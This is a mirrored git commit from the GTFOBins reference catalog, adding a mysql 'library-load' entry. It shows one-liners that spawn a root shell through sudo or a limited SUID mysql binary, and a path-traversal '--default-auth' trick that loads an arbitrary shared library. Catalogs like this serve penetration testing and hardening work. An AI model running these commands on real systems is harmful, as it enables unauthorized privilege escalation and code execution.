1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00

Add MySQL library-load

This commit is contained in:
Andrea Cardaci 2019-03-25 19:40:48 +01:00
parent 73b18859d5
commit 13ab3596bb

View File

@ -7,4 +7,10 @@ functions:
- code: sudo mysql -e '\! /bin/sh'
limited-suid:
- code: ./mysql -e '\! /bin/sh'
library-load:
- description: |
A MySQL server must accept connections in order for this to work.
The following loads the `/path/to/lib.so` shared object.
code: mysql --default-auth ../../../../../path/to/lib
---